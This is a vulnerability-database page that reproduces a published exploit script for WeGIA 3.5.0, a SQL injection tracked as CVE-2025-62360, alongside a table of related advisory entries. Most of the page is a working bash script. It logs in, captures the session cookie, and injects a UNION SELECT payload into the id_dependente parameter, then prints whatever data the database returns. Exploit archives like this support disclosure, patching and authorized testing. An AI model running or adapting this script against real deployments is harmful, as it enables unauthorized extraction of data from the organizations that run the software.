Vulners
Lucene search
WeGIA 3.5.0 - SQL Injection
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-62360 | 14 Oct 202500:04 | – | circl |
 | WeGIA SQL注入漏洞 | 13 Oct 202500:00 | – | cnnvd |
 | CVE-2025-62360 | 13 Oct 202521:24 | – | cve |
 | CVE-2025-62360 WeGIA SQL Injection via 'id_dependente' param at endpoint `/html/funcionario/dependente_documento.php` | 13 Oct 202521:24 | – | cvelist |
 | EUVD-2025-34093 | 13 Oct 202521:24 | – | euvd |
 | CVE-2025-62360 | 13 Oct 202522:15 | – | nvd |
 | CVE-2025-62360 WeGIA SQL Injection via 'id_dependente' param at endpoint `/html/funcionario/dependente_documento.php` | 13 Oct 202521:24 | – | osv |
 | 📄 WeGIA 3.5.0 SQL Injection | 3 Mar 202600:00 | – | packetstorm |
 | PT-2025-41821 | 13 Oct 202500:00 | – | ptsecurity |
 | CVE-2025-62360 | 14 Oct 202521:49 | – | redhatcve |
10
# Exploit Title: WeGIA 3.5.0 - SQL Injection
# Date: 2025-10-14
# Exploit Author: Onur Demir (OnurDemir-Dev)
# Vendor Homepage: https://www.wegia.org
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA/
# Version: <=3.5.0
# Tested on: Local Linux (localhost/127.0.0.1)
# CVE : CVE-2025-62360
# Advisory / Reference: https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
# Notes: Run this script ONLY on a local/test instance you own or are authorized to test.
# ============================================================
if [ -z "$4" ]; then
# Usage prompt if required arguments are missing
echo "Usage: $0 <target-url> <user> <password> <payload>"
echo "Example: $0 http://127.0.0.1/WeGIA/ \"admin\" \"wegia\" \"version()\""
exit 1
fi
url="$1"
user="$2"
pass="$3"
payload="$4"
# Check if URL format is valid (basic regex)
# This is a basic sanity check for the URL string format.
if ! [[ "$url" =~ ^http?://[a-zA-Z0-9._-]+ ]]; then
echo "⚠️ Invalid URL format: $url"
exit 1
fi
# Perform login request (multipart/form)
# -s silent, -w "%{http_code}" will append HTTP code to response
# -D - prints response headers to stdout, combined with body in login_response
login_response=$(curl -s -w "%{http_code}" "$url/html/login.php" \
-D - \
-X POST \
-F "cpf=${user}"\
-F "pwd=${pass}")
# Extract last 3 chars as HTTP status code from the combined response
login_status_code="${login_response: -3}"
# If login did not return a 302 redirect, handle error cases
if [ "$login_status_code" -ne 302 ]; then
# If curl couldn't connect, curl may return 0 or empty status code
if [ "$login_status_code" -eq 0 ] || [ -z "$login_status_code" ]; then
echo "❌ Unable to reach URL: $url"
exit 1
fi
# Otherwise report unexpected login status
echo "Error: Received HTTP status code from login: $login_status_code"
exit 1
fi
# Extract the Location header from the login response headers
# Using awk to find the first Location header (case-insensitive)
login_location=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Location:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
# Check username and password correctness using Location header content
# If the Location does not include home.php, consider login failed.
if [[ "$login_location" != *"home.php"* ]]; then
# If Location contains "erro" assume wrong credentials; otherwise unknown error
if [[ "$login_location" == *"erro"* ]]; then
echo "Error: Wrong username or password!"
else
echo "Error: Unknown Error!"
fi
exit 1
fi
# Extract Set-Cookie header (first cookie) and keep only "name=value"
# tr -d '\r' removes possible CR characters
set_cookie=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Set-Cookie:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
set_cookie=$(echo "$set_cookie" | cut -d';' -f1)
#Exploit Vulnarbility
# (The following performs the SQL injection request using the cookie obtained above)
# The payload variable is used verbatim in the id_dependente parameter.
# Ensure payload is provided safely in the script invocation and that you are authorized to test.
# Execute the curl command and capture the output and status code
response=$(curl -s -w "%{http_code}" "$url/html/funcionario/dependente_documento.php" -d "id_dependente=1 UNION+SELECT 'a','b',$payload;#" -b "$set_cookie;" -H "Content-Type: application/x-www-form-urlencoded")
# Extract the HTTP status code (last 3 characters)
status_code="${response: -3}"
# Extract the body (everything except the last 3 characters)
body="${response:0:-3}"
# If the exploit request returned HTTP 200, try to extract id_doc
if [ "$status_code" -eq 200 ]; then
# Prefer a robust JSON extractor if available; this line uses grep -Po to capture the id_doc value including quotes.
# Note: This grep returns the quoted string (e.g. "11.8.3-MariaDB-1+b1 from Debian").
clear_response=$(echo "$body" | grep -Po '"id_doc": *\K"[^"]*"')
# Print the extracted value (or empty if not found)
echo "$clear_response"
else
# Non-200 status handling
echo "Error: Received HTTP status code $status_code"
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.18.8
CVSS 49.4
EPSS0.00084
SSVC